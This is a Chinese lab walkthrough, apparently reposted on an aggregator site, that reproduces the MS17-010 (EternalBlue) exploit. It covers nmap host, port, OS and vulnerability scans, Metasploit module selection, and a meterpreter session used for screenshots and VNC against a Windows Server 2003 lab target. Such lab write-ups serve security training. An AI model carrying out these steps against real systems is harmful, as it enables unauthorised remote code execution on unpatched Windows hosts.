【ms17-010】永恒之蓝漏洞复现

这篇具有很好参考价值的文章主要介绍了【ms17-010】永恒之蓝漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

【ms17-010】永恒之蓝漏洞复现

准备工作

  • 攻击机:kali,ip:192.168.56.128
  • 靶机:windows server 2003,ip:192.168.56.132
  • 工具:nmap(扫描)、msf

漏洞利用

首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况

nmap -sS 192.168.56.0/24
/24是子网掩码1的的位数,代表有24个一,其余8位为0,即:255.255.255.0

此时已经扫描出来了,ip为:192.168.56.132的主机开启,并且显示了开放的端口号。

然后我们可以使用:

nmap -p 1-1000 192.168.56.132

去扫描该主机端口从1-1000的开放情况

可以看到开放了如下端口:

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

接着我们使用命令去扫描该主机的操作系统类型:

nmap -O 192.168.56.132

永恒之蓝扫描工具,漏洞复现,服务器,安全,web安全

查询出来操作系统为:win2003

分析了相关信息后,我们就可以使用nmap自带的脚本去扫描该主机上的漏洞了:

nmap --script=vuln 192.168.56.132

永恒之蓝扫描工具,漏洞复现,服务器,安全,web安全

这里扫描出来了两个漏洞,ms17-010就是永恒之蓝漏洞

我们已经使用nmap扫描出来了漏洞,接着我们需要使用工具利用漏洞

这里我们选择 Metasploit Framework(MSF)

Metasploit(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。

它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具

因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。

kali上,我们使用 msfconsole,进入这个工具:

由于我们在上面已经知道了永恒之蓝编号:(ms17-010)

所以我们在msf中可以使用search命令去搜索相关漏洞:

search ms17-010

永恒之蓝扫描工具,漏洞复现,服务器,安全,web安全

然后我们使用use命令,去选择相关模块:

use 1   # 我们选择一号模块,可以远程执行代码

永恒之蓝扫描工具,漏洞复现,服务器,安全,web安全

然后我们使用命令:show options,显示配置项

永恒之蓝扫描工具,漏洞复现,服务器,安全,web安全

此处我们设置一下RHOSTS(靶机的ip地址),使用set命令

set RHOSTS 192.168.56.132

永恒之蓝扫描工具,漏洞复现,服务器,安全,web安全

设置完成之后,就可以开始攻击了,使用run或者exploit

永恒之蓝扫描工具,漏洞复现,服务器,安全,web安全

运行成功会出现meterpreter >
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

这个时候我们已经成功了,远程命令执行。

我们使用screenshot命令,获取靶机的屏幕截图

永恒之蓝扫描工具,漏洞复现,服务器,安全,web安全

还可以使用远程桌面命令:

run vnc

永恒之蓝扫描工具,漏洞复现,服务器,安全,web安全

help命令可以查看可以使用哪些命令

反弹shell文章来源地址https://www.toymoban.com/news/detail-805654.html

到了这里,关于【ms17-010】永恒之蓝漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 永恒之蓝ms17_010漏洞复现

    攻击机:Linux kali(IP:192.168.52.132) 靶机:Windows 7(x64)(IP:192.168.52.130) 条件:靶机防火墙关闭,两台机子能够相互ping通,靶机445端口开启(永恒之蓝漏洞就是通过恶意代码扫描并攻击开放445端口的 Windows 主机)   登录 kali linux,用 nmap 探测本网段存活主机 nmap 192.168.5

    2024年02月11日
    浏览(39)
  • 《MS17-010(永恒之蓝)—漏洞复现及防范》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 - 永恒之蓝 永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。而SMB服务是一个协议名,它能被用于Web连接和客户端与服

    2024年02月06日
    浏览(86)
  • ms17-010(永恒之蓝) 漏洞复现与处理

    ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入

    2024年02月09日
    浏览(43)
  • MS17-010(永恒之蓝)漏洞分析与复现

    一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广

    2024年02月02日
    浏览(39)
  • 永恒之蓝漏洞复现(ms17-010)----保姆级教程

    攻击机: kali Linux             靶机: win7 x64    提示:  复现攻击前请关闭杀毒软件   1.复现第一步按以下操作打开 445端口: 在 \\\"运行\\\" 里输入: regedit 打开注册表编辑器                                                                    

    2023年04月08日
    浏览(46)
  • 利用kali Linux复现永恒之蓝(MS17-010)漏洞

    目录 什么是永恒之蓝? 永恒之蓝漏洞原理 实验环境 操作前提 实验步骤 (1)复现成功后,执行截图命令 (2)对受害机器建立用户,并且开启受害机器的远程桌面并连接 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒

    2024年02月12日
    浏览(36)
  • MS17-010永恒之蓝漏洞复现(手把手教程,超细!)

    0x00-声明:小白一枚,写下来为了记录和学习交流,大神不喜勿喷。 0x01-思路:网段扫描—获取IP—漏洞扫描—发现存在漏洞—攻击拿shell—提权 目录 一、环境搭建                 01 所需软件:  二、开始操作  01 kali 开始网段扫描 02 漏洞利用 03 提权 04 利用管理员用

    2023年04月09日
    浏览(77)
  • 复现永恒之蓝[MS17_010]

    目录 准备靶机 测试ping连通性 攻击漏洞 利用漏洞 1台kali,1台win7 win7系统可以在MSDN镜像网站里获取 注:将win7安装好,win7无法安装vmtools,若升级系统,可能会把永恒之蓝补丁打上,所以建议别升级系统     win7的IP地址为192.168.164.129  kali的IP地址为192.168.164.130 将这两台机器互

    2024年02月01日
    浏览(36)
  • 永恒之蓝(ms17-010)简介与复现

    永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲

    2024年02月10日
    浏览(48)
  • 永恒之蓝漏洞 ms17_010 详解

    永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企

    2024年02月08日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包